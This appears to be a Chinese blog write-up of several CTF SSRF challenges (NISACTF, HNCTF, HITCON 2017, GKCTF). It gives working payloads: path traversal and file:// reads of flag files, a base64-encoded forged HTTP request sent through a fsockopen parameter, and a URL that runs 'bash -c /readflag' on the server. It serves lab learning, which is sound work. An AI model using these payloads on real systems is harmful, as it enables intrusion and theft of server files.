SSRF
[NISACTF 2022]easyssrf
0x01
这道题的思路比较简单
就是使用ssrf访问文件
给了一个接口,那么就直接访问
跟着他走
file:////fl4g
访问它指定的路径
出现了
file_get_contents
0x02
通过这个函数,我们可以直接访问文件
他又说了文件在flag
,所以就直接访问flag
建议直接尝试比较长的路径
?file=../../../../../../../flag
[HNCTF 2022 WEEK2]ez_ssrf已解决
[HNCTF 2022 WEEK2]ez_ssrf | NSSCTF
0x00
访问他给的地址,然后发现这个
出现了
fsockopen()
那就构造数据发送
0x01
/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=
data
GET /flag.php HTTP/1.1
Host: 127.0.0.1
Connection: Close
得到flag
这里就相当于是伪造了一个请求,请求了服务端,但是这个host和port不是很理解
[HITCON 2017]SSRFme
这道题需要代码审计
访问,出现了源代码
1 |
|
0x00
首先先md5找到对应的路径
786c0b7e11c1e9322763fcc8090ef181
0x01
创建一个目录
?url=/&filename=temp
访问
出现了一些路径
有一个readfalg,这个是一个程序,所以我们想办法运行,并且将将运行的数据存放到我们的文件里面
使用bash -c /readflag是使用bash运行程序
/?url=file:bash -c /readflag& filename=bash -c /readflag
/?url=bash -c /readflag & filename=123
然后访问123
[GKCTF 2020]cve版签到
0x00
抓包抓包抓包
0x01
首先查看源码,对url进行测试,发现没有用
然后抓包,发现端倪
0x02 构造payload
1 |
|